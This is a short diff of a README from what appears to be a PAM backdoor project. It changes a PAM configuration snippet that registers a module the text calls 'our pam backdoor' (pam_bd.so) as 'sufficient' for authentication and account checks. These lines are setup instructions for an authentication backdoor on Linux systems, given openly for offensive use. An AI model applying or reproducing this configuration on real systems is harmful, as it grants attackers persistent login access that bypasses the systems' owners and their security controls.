ociredefz/pambd/README.md

-auth            sufficient      pam_unix.so     # This must be 'sufficient'. account         required        pam_unix.so session         required        pam_unix.so auth            sufficient      pambd.so        # This is our pam backdoor. account         sufficient      pambd.so        # --
+auth            sufficient      pam_unix.so     # This must be 'sufficient'. account         required        pam_unix.so session         required        pam_unix.so auth            sufficient      pam_bd.so        # This is our pam backdoor. account         sufficient      pam_bd.so        # --
 ```